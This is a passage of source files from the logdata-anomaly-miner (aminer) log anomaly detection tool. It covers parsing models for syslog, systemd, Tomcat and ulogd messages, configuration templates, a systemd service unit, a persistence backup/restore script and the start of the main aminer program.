AnyByteDataModelElement("msg")]), SequenceModelElement("mysqld_safe", [ FixedDataModelElement("mysqld_safe_str", b" mysqld_safe["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("mysqld", [ FixedDataModelElement("mysqld_str", b" mysqld["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("php7.0", [ FixedDataModelElement("php7.0_str", b" php7.0-"), DelimitedDataModelElement("service", b":"), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg")]), SequenceModelElement("libapache2-mod-php7.0", [ FixedDataModelElement("libapache2-mod-php7.0_str", b" libapache2-mod-php7.0: "), AnyByteDataModelElement("msg")]), SequenceModelElement("php", [ FixedDataModelElement("php_str", b" php-"), DelimitedDataModelElement("service", b":"), FixedDataModelElement("colon", b": "), AnyByteDataModelElement("msg")]), SequenceModelElement("apache2_postinst", [ FixedDataModelElement("apache2_postinst_str", b" apache2.postinst: "), AnyByteDataModelElement("msg")]), SequenceModelElement("smbd", [ FixedDataModelElement("smbd_str", b" smbd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("ut", [ FixedDataModelElement("ut_str", b" ut["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), AnyByteDataModelElement("msg")]), SequenceModelElement("apachectl", [ FixedDataModelElement("apachectl_str", b" apachectl["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("brack_str1", b"]: "), FirstMatchModelElement("fm", [ SequenceModelElement("ah00548", [ FixedDataModelElement("ah00548", b"AH00548: NameVirtualHost has no effect and will be removed in the next release "), AnyByteDataModelElement("cfg_path") ]) ]) ]) ]) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/SyslogPreambleModel.py000066400000000000000000000023461500476301700327650ustar00rootroot00000000000000"""This module defines a parser for syslog.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(time_model=None): """Return the model for parsing a standard syslog preamble including timestamp and hostname. @param time_model when not none, the given model element is used for parsing timestamps. Otherwise a standard DateTimeModelElement with format b"%b %d %H:%M:%S" is created. CAVEAT: the standard model may not work when log data timestamp locale does not match host or shell environment locale. See MultiLocaleDatetime_modelElement instead. """ if time_model is None: time_model = DateTimeModelElement("time", b"%b %d %H:%M:%S", start_year=2020) host_name_model = VariableByteDataModelElement("host", b"-.01234567890abcdefghijklmnopqrstuvwxyz") model = SequenceModelElement("syslog", [ time_model, FixedDataModelElement("sp0", b" "), host_name_model, FixedDataModelElement("sp1", b" ") ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/SystemdParsingModel.py000066400000000000000000000143201500476301700330040ustar00rootroot00000000000000"""This module contains functions and classes to create the parsing model.""" from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(): """Return the model of all three types.""" model = FirstMatchModelElement("systemd-fm", [ get_systemd_model(), get_logind_model(), get_tmp_files_model() ]) return model def get_systemd_model(): """Return the parsing model for messages directly from systemd.""" type_children = [ FixedDataModelElement("apt-daily-start", b"Starting Daily apt upgrade and clean activities..."), FixedDataModelElement("apt-daily-started", b"Started Daily apt upgrade and clean activities."), FixedDataModelElement("apt-daily-finished", b"Finished Daily apt upgrade and clean activities."), SequenceModelElement("service-succeeded", [ DelimitedDataModelElement("service", b" "), FixedDataModelElement("s0", b" Succeeded.") ]), FixedDataModelElement("clean-php", b"Finished Clean php session files."), FixedDataModelElement("finished-logrotate", b"Finished Rotate log files."), FixedDataModelElement("finished-man-db-daily", b"Finished Daily man-db regeneration."), FixedDataModelElement("finished-ubuntu-advantages", b"Finished Ubuntu Advantage APT and MOTD Messages."), FixedDataModelElement("finished-refresh", b"Finished Refresh fwupd metadata and update motd."), FixedDataModelElement("finished-daily-apt", b"Finished Daily apt download activities."), SequenceModelElement("apt-daily-timer", [ FixedDataModelElement("s0", b"apt-daily.timer: Adding "), OptionalMatchModelElement("hopt", SequenceModelElement("hblock", [ DecimalIntegerValueModelElement("hours"), FixedDataModelElement("s1", b"h ") ])), DecimalIntegerValueModelElement("minutes"), FixedDataModelElement("s2", b"min "), DecimalFloatValueModelElement("seconds"), FixedDataModelElement("s3", b"s random time.") ]), FixedDataModelElement("tmp-file-cleanup", b"Starting Cleanup of Temporary Directories..."), FixedDataModelElement("tmp-file-cleanup-started", b"Started Cleanup of Temporary Directories."), SequenceModelElement("killing-process", [ DelimitedDataModelElement("service", b":"), FixedDataModelElement("s0", b": Killing process "), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s1", b" (update-notifier) with signal SIGKILL.") ]), SequenceModelElement("starting", [ FixedDataModelElement("s0", b"Starting "), DelimitedDataModelElement("service", b"."), FixedDataModelElement("s1", b"...") ]), SequenceModelElement("started", [ FixedDataModelElement("s0", b"Started "), DelimitedDataModelElement("service", b".", consume_delimiter=True) ]), FixedDataModelElement("reloading", b"Reloading.") ] model = SequenceModelElement("systemd", [ FixedDataModelElement("sname", b"systemd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model def get_logind_model(user_name_model=None): """Return a model to parse a systemd logind daemon message after any standard logging preamble, e.g. from syslog.""" if user_name_model is None: user_name_model = VariableByteDataModelElement("user", b"0123456789abcdefghijklmnopqrstuvwxyz-_") type_children = [ SequenceModelElement("new session", [ FixedDataModelElement("s0", b"New session "), DecimalIntegerValueModelElement("session"), FixedDataModelElement("s1", b" of user "), user_name_model, FixedDataModelElement("s2", b".") ]), SequenceModelElement("removed session", [ FixedDataModelElement("s0", b"Removed session "), DecimalIntegerValueModelElement("session"), FixedDataModelElement("s1", b".") ]), SequenceModelElement("logged out", [ FixedDataModelElement("s0", b"Session "), DecimalIntegerValueModelElement("session"), FixedDataModelElement("s1", b" logged out. Waiting for processes to exit.") ]), FixedDataModelElement("failed abandon", b"Failed to abandon session scope: Transport endpoint is not connected") ] # Will fail on username models including the dot at the end. model = SequenceModelElement("systemd-logind", [ FixedDataModelElement("sname", b"systemd-logind["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model def get_tmp_files_model(): """Return a model to parse a systemd tmpfiles daemon message after any standard logging preamble, e.g. from syslog.""" type_children = [ SequenceModelElement("duplicate", [ FixedDataModelElement("s0", b'[/usr/lib/tmpfiles.d/var.conf:14] Duplicate line for path "'), DelimitedDataModelElement("path", b'", ignoring.'), FixedDataModelElement("s2", b'", ignoring.') ]) ] # Will fail on username models including the dot at the end. model = SequenceModelElement("systemd-tmpfiles", [ FixedDataModelElement("sname", b"systemd-tmpfiles["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/TomcatParsingModel.py000066400000000000000000000020221500476301700325770ustar00rootroot00000000000000"""This module defines a parser for tomcat.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement def get_model(): """Return the model.""" type_children = [ FixedDataModelElement("start", b" * Starting Tomcat servlet engine tomcat7"), FixedDataModelElement("stop", b" * Stopping Tomcat servlet engine tomcat7"), FixedDataModelElement("done", b" ...done."), AnyByteDataModelElement("unparsed") ] model = SequenceModelElement("tomcat7", [ FixedDataModelElement("sname", b"tomcat7["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/UlogdParsingModel.py000066400000000000000000000131731500476301700324330ustar00rootroot00000000000000"""This module defines the parser for ulogd messages.""" from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement def get_model(): """Return a model for su session information messages after any standard logging preamble, e.g. from syslog.""" type_children = [ SequenceModelElement("build-stack", [ FixedDataModelElement("s0", b"building new pluginstance stack: \""), DelimitedDataModelElement("stack", b"\""), FixedDataModelElement("s1", b"\"") ]), SequenceModelElement("nfct-event", [ FixedDataModelElement("s0", b"[DESTROY] ORIG: SRC="), IpAddressDataModelElement("osrcip"), FixedDataModelElement("s1", b" DST="), IpAddressDataModelElement("odstip"), FixedDataModelElement("s2", b" PROTO="), FixedWordlistDataModelElement("proto", [b"TCP", b"UDP"]), FixedDataModelElement("s3", b" SPT="), DecimalIntegerValueModelElement("ospt"), FixedDataModelElement("s4", b" DPT="), DecimalIntegerValueModelElement("odpt"), FixedDataModelElement("s5", b" PKTS="), DecimalIntegerValueModelElement("opkts"), FixedDataModelElement("s6", b" BYTES="), DecimalIntegerValueModelElement("obytes"), FixedDataModelElement("s7", b" , REPLY: SRC="), IpAddressDataModelElement("rsrcip"), FixedDataModelElement("s8", b" DST="), IpAddressDataModelElement("rdstip"), FixedDataModelElement("s9", b" PROTO="), FixedWordlistDataModelElement("rproto", [b"TCP", b"UDP"]), FixedDataModelElement("s10", b" SPT="), DecimalIntegerValueModelElement("rspt"), FixedDataModelElement("s11", b" DPT="), DecimalIntegerValueModelElement("rdpt"), FixedDataModelElement("s12", b" PKTS="), DecimalIntegerValueModelElement("rpkts"), FixedDataModelElement("s13", b" BYTES="), DecimalIntegerValueModelElement("rbytes"), # No additional whitespace from Ubuntu Trusty 14.04 on. OptionalMatchModelElement("tail", FixedDataModelElement("s0", b" ")) ]), FixedDataModelElement("nfct-plugin", b"NFCT plugin working in event mode"), FixedDataModelElement("reopen", b"reopening capture file"), FixedDataModelElement("signal", b"signal received, calling pluginstances"), FixedDataModelElement("uidchange", b"Changing UID / GID"), SequenceModelElement("seq", [ FixedDataModelElement("s0", b"id=\""), DecimalIntegerValueModelElement("id"), FixedDataModelElement("s1", b"\" severity=\""), DelimitedDataModelElement("severity", b"\""), FixedDataModelElement("s2", b"\" sys=\""), DelimitedDataModelElement("sys", b"\""), FixedDataModelElement("s3", b"\" sub=\""), DelimitedDataModelElement("sub", b"\""), FixedDataModelElement("s4", b"\" name=\""), DelimitedDataModelElement("name", b"\""), FixedDataModelElement("s5", b"\" action=\""), DelimitedDataModelElement("action", b"\""), FixedDataModelElement("s6", b"\" fwrule=\""), DelimitedDataModelElement("fwrule", b"\""), FixedDataModelElement("s7", b"\" initf=\""), DelimitedDataModelElement("initf", b"\""), FixedDataModelElement("s8", b"\" srcmac=\""), DelimitedDataModelElement("srcmac", b"\""), FixedDataModelElement("s9", b"\" dstmac=\""), DelimitedDataModelElement("dstmac", b"\""), FixedDataModelElement("s10", b"\" srcip=\""), DelimitedDataModelElement("srcip", b"\""), FixedDataModelElement("s11", b"\" dstip=\""), DelimitedDataModelElement("dstip", b"\""), FixedDataModelElement("s12", b"\" proto=\""), DelimitedDataModelElement("proto", b"\""), FixedDataModelElement("s13", b"\" length=\""), DelimitedDataModelElement("length", b"\""), FixedDataModelElement("s14", b"\" tos=\""), DelimitedDataModelElement("tos", b"\""), FixedDataModelElement("s15", b"\" prec=\""), DelimitedDataModelElement("prec", b"\""), FixedDataModelElement("s16", b"\" ttl=\""), DelimitedDataModelElement("ttl", b"\""), FixedDataModelElement("s17", b"\" srcport=\""), DelimitedDataModelElement("srcport", b"\""), FixedDataModelElement("s18", b"\" dstport=\""), DelimitedDataModelElement("dstport", b"\""), FixedDataModelElement("s19", b"\" tcpflags=\""), DelimitedDataModelElement("tcpflags", b"\""), FixedDataModelElement("s20", b"\"") ]) ] # Netflow entry model = SequenceModelElement("ulogd", [ FixedDataModelElement("sname", b"ulogd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-enabled/000077500000000000000000000000001500476301700245335ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-enabled/Readme.txt000066400000000000000000000007121500476301700264710ustar00rootroot00000000000000This directory contains files enabled to be included in the analysis pipeline configuration. The files are made available by including this directory within the site packages. If you have objections enabling all the python site packages stored on this host within a process running with elevated privileges, you can also include only some site package components by placing symlinks here, e.g. ln -s /usr/lib/python3.6/dist-packages/pytz conf-enabled/pytz logdata-anomaly-miner-2.8.0/source/root/etc/aminer/template_config.py000066400000000000000000000112631500476301700257330ustar00rootroot00000000000000# This is a template for the "aminer" logdata-anomaly-miner tool. Copy # it to "config.py" and define your ruleset. For more examples of component # usage see aecid-testsuite/demo/aminer/demo-config.py. # Define the list of log resources to read from: the resources # named here do not need to exist when aminer is started. This # will just result in a warning. However, if they exist, they have # to be readable by the aminer process! Supported types are: # * file://[path]: Read data from file, reopen it after rollover # * unix://[path]: Open the path as UNIX local socket for reading # Define the uid/gid of the process that runs the calculation # after opening the log files: config_properties = {'LogResourceList': ['file:///tmp/syslog'], 'AminerUser': 'aminer', 'AminerGroup': 'aminer'} learn_mode = True # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. # config_properties['Core.PersistenceDir'] = '/var/lib/aminer' # Set the Unix-Domain-Socket for RemoteControl # RemoteControlSocket: '/var/lib/aminer/log/remcontrol.sock' # Add your ruleset here: def build_analysis_pipeline(analysis_context): """Define the function to create pipeline for parsing the log data. It has also to define an AtomizerFactory to instruct aminer how to process incoming data streams to create log atoms from them. """ # Build the parsing model: from aminer.parsing.SequenceModelElement import SequenceModelElement import ApacheAccessModel apache_access_model = ApacheAccessModel.get_model() parsing_model = SequenceModelElement('model', [apache_access_model]) # Some generic imports. from aminer.analysis import AtomFilters # Create all global handler lists here and append the real handlers # later on. # Use this filter to distribute all atoms to the analysis handlers. atom_filter = AtomFilters.SubhandlerFilter(None) anomaly_event_handlers = [] # Now define the AtomizerFactory using the model. A simple line # based one is usually sufficient. from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory( parsing_model, [atom_filter], anomaly_event_handlers, default_timestamp_path_list=['/model/accesslog/time']) # Just report all unparsed atoms to the event handlers. from aminer.analysis.UnparsedAtomHandlers import SimpleUnparsedAtomHandler atom_filter.add_handler(SimpleUnparsedAtomHandler(anomaly_event_handlers), stop_when_handled_flag=True) from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector new_match_path_detector = NewMatchPathDetector(analysis_context.aminer_config, anomaly_event_handlers, learn_mode=learn_mode) analysis_context.register_component(new_match_path_detector, component_name=None) atom_filter.add_handler(new_match_path_detector) # Check if status-code changed from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector new_match_path_value_detector = NewMatchPathValueDetector( analysis_context.aminer_config, ["/model/accesslog/status"], anomaly_event_handlers, learn_mode=learn_mode) analysis_context.register_component(new_match_path_value_detector, component_name=None) atom_filter.add_handler(new_match_path_value_detector) # Check if HTTP-Method for a HTTP-Request has changed from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector new_match_path_value_combo_detector = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ "/model/accesslog/request", "/model/accesslog/method"], anomaly_event_handlers, learn_mode=learn_mode) analysis_context.register_component(new_match_path_value_combo_detector, component_name=None) atom_filter.add_handler(new_match_path_value_combo_detector) # Check if HTTP-Statuscode for a HTTP-Request has changed new_match_path_value_combo_detector2 = NewMatchPathValueComboDetector(analysis_context.aminer_config, [ "/model/accesslog/request", "/model/accesslog/status"], anomaly_event_handlers, learn_mode=learn_mode) analysis_context.register_component(new_match_path_value_combo_detector2, component_name=None) atom_filter.add_handler(new_match_path_value_combo_detector2) # Add stdout stream printing for debugging, tuning. from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler anomaly_event_handlers.append(StreamPrinterEventHandler(analysis_context)) logdata-anomaly-miner-2.8.0/source/root/etc/aminer/template_config.yml000066400000000000000000000113721500476301700261050ustar00rootroot00000000000000# This is a template for the "aminer" logdata-anomaly-miner tool. Copy # it to "config.yml" and define your ruleset. For more examples of component # usage see aecid-testsuite/demo/aminer/demo-config.yml. #LearnMode: false # optional AminerUser: 'aminer' # optional default: aminer AminerGroup: 'aminer' # optional default: aminer LogResourceList: - 'file:///var/log/apache2/access.log' # - 'unix:///var/lib/akafka/aminer.sock' # Read and store information to be used between multiple invocations # of aminer in this directory. The directory must only be accessible # to the 'AminerUser' but not group/world readable. On violation, # aminer will refuse to start. When undefined, '/var/lib/aminer' # is used. # Core.PersistenceDir: '/var/lib/aminer' # Directory for logfiles. Default: /var/lib/aminer/log # Core.LogDir: '/var/lib/aminer/log' # Define a target e-mail address to send alerts to. When undefined, # no e-mail notification hooks are added. # MailAlerting.TargetAddress: 'root@localhost' # Sender address of e-mail alerts. When undefined, "sendmail" # implementation on host will decide, which sender address should # be used. # MailAlerting.FromAddress: 'root@localhost' # Define, which text should be prepended to the standard aminer # subject. Defaults to "aminer Alerts:" # MailAlerting.SubjectPrefix: 'aminer Alerts:' # Define a grace time after startup before aminer will react to # an event and send the first alert e-mail. Defaults to 0 (any # event can immediately trigger alerting). # MailAlerting.AlertGraceTime: 0 # Define how many seconds to wait after a first event triggered # the alerting procedure before really sending out the e-mail. # In that timespan, events are collected and will be sent all # using a single e-mail. Defaults to 10 seconds. # MailAlerting.EventCollectTime: 10 # Define the minimum time between two alert e-mails in seconds # to avoid spamming. All events during this timespan are collected # and sent out with the next report. Defaults to 600 seconds. # MailAlerting.MinAlertGap: 600 # Define the maximum time between two alert e-mails in seconds. # When undefined this defaults to "MailAlerting.MinAlertGap". # Otherwise this will activate an exponential backoff to reduce # messages during permanent error states by increasing the alert # gap by 50% when more alert-worthy events were recorded while # the previous gap time was not yet elapsed. # MailAlerting.MaxAlertGap: 600 # Define how many events should be included in one alert mail # at most. This defaults to 1000 # MailAlerting.MaxEventsPerMessage: 1000 # Configure the logline prefix # LogPrefix: '' ######################################################### # #Parser: # - id: 'timeModel' # type: DateTimeModelElement # name: 'time' # args: '%Y-%m-%dT%H:%M:%S.%f' # # - id: 'hostModel' # type: VariableByteDataModelElement # name: 'host' # args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' # # - id: 'reqMethodModel' # type: FixedWordlistDataModelElement # name: 'method' # args: # - 'GET' # - 'POST' # - 'PUT' # - 'HEAD' # - id: 'apacheModel' # type: ApacheAccessModel # name: 'apache' # args: 'apache' # # - id: 'START' # start: True # type: SequenceModelElement # name: 'model' # args: # - timeModel # - hostModel # - reqMethodModel # - apacheModel Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' args: 'apache' - id: 'startModel' start: True type: SequenceModelElement name: 'model' args: - apacheModel Input: multi_source: False # optional timestamp_paths: "/model/accesslog/time" Analysis: - type: "NewMatchPathValueDetector" paths: ["/model/accesslog/status"] persistence_id: 'accesslog_status' # optional default: Default output_logline: false learn_mode: true - type: "NewMatchPathValueComboDetector" paths: ["/model/accesslog/request","/model/accesslog/method"] learn_mode: true persistence_id: 'accesslog_request' # optional default: Default output_logline: false allow_missing_values: false # optional default: false - type: "NewMatchPathValueComboDetector" paths: ["/model/accesslog/request","/model/accesslog/status"] learn_mode: true EventHandlers: - id: "stpe" json: true # optional default: false type: "StreamPrinterEventHandler" - id: "syslog" type: "SyslogWriterEventHandler" logdata-anomaly-miner-2.8.0/source/root/lib/000077500000000000000000000000001500476301700207365ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/lib/systemd/000077500000000000000000000000001500476301700224265ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/lib/systemd/system/000077500000000000000000000000001500476301700237525ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/lib/systemd/system/aminer.service000066400000000000000000000012741500476301700266130ustar00rootroot00000000000000[Unit] Description=aminer log data mining server Documentation=man:aminer(1) [Service] Type=simple ExecStartPre=/usr/bin/touch /var/log/aminer.log ExecStartPre=/bin/chown aminer:aminer /var/log/aminer.log ExecStart=/usr/lib/logdata-anomaly-miner/aminer.py --config /etc/aminer/config.yml KillMode=control-group Restart=on-failure # Write everything to /dev/null: if aminer is misconfigured, it # may detect anonamies in its own log data, thus creating a logging # loop. You may prefer logging to journal only, which needs journald # to be reconfigured with "ForwardToSyslog=false". StandardOutput=file:/var/log/aminer.log StandardError=file:/var/log/aminer.log [Install] WantedBy=multi-user.target logdata-anomaly-miner-2.8.0/source/root/usr/000077500000000000000000000000001500476301700210015ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/000077500000000000000000000000001500476301700215475ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/000077500000000000000000000000001500476301700257305ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer-persistence.py000077500000000000000000000117441500476301700321110ustar00rootroot00000000000000#!/usr/bin/python3 # -*- coding: utf-8 -*- import sys import os import re import argparse sys.path = sys.path[1:] + ['/usr/lib/logdata-anomaly-miner', '/etc/aminer/conf-enabled'] venv_path = "/usr/lib/logdata-anomaly-miner/.venv/lib" if os.path.exists(venv_path): python_version = os.listdir(venv_path)[0] sys.path += [os.path.join(venv_path, python_version, "site-packages")] from aminer.AminerConfig import load_config, KEY_AMINER_USER, KEY_AMINER_GROUP, KEY_PERSISTENCE_DIR # noqa: E402 from aminer.util.StringUtil import colflame, flame, supports_color # noqa: E402 from aminer.util.PersistenceUtil import clear_persistence, copytree # noqa: E402 from metadata import __version_string__ # noqa: E402 def main(): """Run the aminer-persistence program.""" # Extract program name, but only when sure to contain no problematic characters. program_name = sys.argv[0].split('/')[-1] if (program_name == '.') or (program_name == '..') or (re.match('^[a-zA-Z0-9._-]+$', program_name) is None): print('Invalid program name, check your execution args', file=sys.stderr) sys.exit(1) help_message = 'aminer-persistence\n' if supports_color(): help_message += colflame else: help_message += flame help_message += 'For further information read the man pages running "man aminerRemoteControl".' parser = argparse.ArgumentParser(description=help_message, formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('-v', '--version', action='version', version=__version_string__) parser.add_argument('-c', '--config', type=str, help='path to the config-file') parser.add_argument('-l', '--list', action='store_true', help='list all existing backups') parser.add_argument('-b', '--backup', action='store_true', help='create a backup with the current datetime') parser.add_argument('-r', '--restore', type=str, help='restore a persistence backup') parser.add_argument('-u', '--user', type=str, help='set the aminer user. Only used with --restore') parser.add_argument('-g', '--group', type=str, help='set the aminer group. Only used with --restore') parser.add_argument('-p', '--persistence-dir', type=str, help='set the persistence directory. Only used with --restore') args = parser.parse_args() absolute_persistence_path = None config_file_name = args.config rc_response_string = 'Remote execution response: ' if args.list: process = os.popen('/usr/bin/aminerremotecontrol --exec "list_backups(analysis_context)"') # nosec B605 print(process.read().strip('\n').strip(rc_response_string)) if args.backup: process = os.popen('/usr/bin/aminerremotecontrol --exec "create_backup(analysis_context)"') # nosec B605 print(process.read().strip('\n').strip(rc_response_string)) if args.restore is not None: if not args.restore.startswith('/'): print('The restore path must be absolute.', file=sys.stderr) sys.exit(1) absolute_persistence_path = args.restore if '.' in args.user or '/' in args.user: print(f"The aminer user {args.user} must not contain any . or /", file=sys.stderr) sys.exit(1) aminer_user = args.user if '.' in args.group or '/' in args.group: print(f"The aminer group {args.group} must not contain any . or /", file=sys.stderr) sys.exit(1) aminer_grp = args.group if not args.persistence_dir.startswith('/'): print('The persistence_dir path must be absolute.', file=sys.stderr) sys.exit(1) persistence_dir = args.persistence_dir if absolute_persistence_path is not None: if config_file_name is not None: aminer_config = load_config(config_file_name) if args.user is None: aminer_user = aminer_config.config_properties[KEY_AMINER_USER] if args.group is None: aminer_grp = aminer_config.config_properties[KEY_AMINER_GROUP] if args.persistence_dir is None: persistence_dir = aminer_config.config_properties[KEY_PERSISTENCE_DIR] else: aminer_user = 'aminer' aminer_grp = 'aminer' persistence_dir = '/var/lib/aminer' if not os.path.exists(absolute_persistence_path): print(f"{absolute_persistence_path} does not exist.", file=sys.stderr) else: from pwd import getpwnam from grp import getgrnam child_user_id = getpwnam(aminer_user).pw_uid child_group_id = getgrnam(aminer_grp).gr_gid clear_persistence(persistence_dir) copytree(absolute_persistence_path, persistence_dir) for dirpath, _dirnames, filenames in os.walk(persistence_dir): os.chown(dirpath, child_user_id, child_group_id) for filename in filenames: os.chown(os.path.join(dirpath, filename), child_user_id, child_group_id) print(f"Restored persistence from {absolute_persistence_path} successfully.") main() logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer.py000077500000000000000000001210241500476301700275600ustar00rootroot00000000000000#!/usr/bin/python3 # -*- coding: utf-8 -*- """This is the main program of the "aminer" logfile miner tool. It does not import any local default site packages to decrease the attack surface due to manipulation of unused but available packages. CAVEAT: This process will keep running with current permissions, no matter what was specified in 'AminerUser' and 'AminerGroup' configuration properties. This is required to allow the aminer parent process to reopen log files, which might need the elevated privileges. NOTE: This tool is developed to allow secure operation even in hostile environment, e.g. when one directory, where aminer attempts to open logfiles is already under full control of an attacker. However, it is not intended to be run as SUID-binary, this would require code changes to protect also against standard SUID attacks. Parameters: * --config [file]: Location of configuration file, defaults to '/etc/aminer/config.py' when not set. * --run-analysis: This parameters is NOT intended to be used on command line when starting aminer, it will trigger execution of the unprivileged aminer background child performing the real analysis. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import errno import os import re import socket import time import sys import logging import shutil import warnings import argparse import stat import tempfile import ast from pwd import getpwnam from grp import getgrnam from logging.handlers import RotatingFileHandler # As site packages are not included, define from where we need to execute code before loading it. sys.path = sys.path[1:] + ["/usr/lib/logdata-anomaly-miner", "/etc/aminer/conf-enabled"] venv_path = "/usr/lib/logdata-anomaly-miner/.venv/lib" if os.path.exists(venv_path): python_version = os.listdir(venv_path)[0] sys.path += [os.path.join(venv_path, python_version, "site-packages")] import aminer.AminerConfig as AminerConfig # noqa: E402 from aminer.util.StringUtil import colflame, flame, supports_color, decode_string_as_byte_string # noqa: E402 from aminer.util.PersistenceUtil import clear_persistence, copytree # noqa: E402 from aminer.util import SecureOSFunctions # noqa: E402 from aminer.AnalysisChild import AnalysisChild # noqa: E402 from aminer.input.LogStream import FileLogDataResource, UnixSocketLogDataResource # noqa: E402 from metadata import __version_string__, __version__ # noqa: E402 child_termination_triggered_flag = False offline_mode = False def run_analysis_child(aminer_config, program_name): """Run the Analysis Child.""" # Verify existence and ownership of persistence directory. logging.getLogger(AminerConfig.REMOTE_CONTROL_LOG_NAME).info('aminer started.') logging.getLogger(AminerConfig.DEBUG_LOG_NAME).info('aminer started.') persistence_dir_name = aminer_config.config_properties.get(AminerConfig.KEY_PERSISTENCE_DIR, AminerConfig.DEFAULT_PERSISTENCE_DIR) persistence_dir_fd = SecureOSFunctions.secure_open_base_directory(persistence_dir_name, os.O_RDONLY | os.O_DIRECTORY | os.O_PATH) stat_result = os.fstat(persistence_dir_fd) if ((not stat.S_ISDIR(stat_result.st_mode)) or ((stat_result.st_mode & stat.S_IRWXU) != 0o700) or ( stat_result.st_uid != os.getuid()) or (stat_result.st_gid != os.getgid())): msg = f"FATAL: persistence directory \"{repr(persistence_dir_name)}\" has to be owned by analysis process (uid " \ f"{stat_result.st_uid}!={os.getuid()}, gid {stat_result.st_gid}!={os.getgid()}) and have access mode 0700 only!" print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).critical(msg) sys.exit(1) import posix1e # O_PATH is problematic when checking ACL. However, it is possible to check the ACL using the file name. try: if posix1e.has_extended(persistence_dir_name): msg = f"WARNING: SECURITY: Extended POSIX ACLs are set in {persistence_dir_name.decode()}, but not supported by the aminer. " \ f"Backdoor access could be possible." print(msg, file=sys.stderr) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).warning(msg) except OSError: # system does not support POSIX ACLs. pass child = AnalysisChild(program_name, aminer_config) child.offline_mode = offline_mode # This function call will only return on error or signal induced normal termination. child_return_status = child.run_analysis(3) if child_return_status == 0: sys.exit(0) msg = f"{program_name}: run_analysis terminated with unexpected status 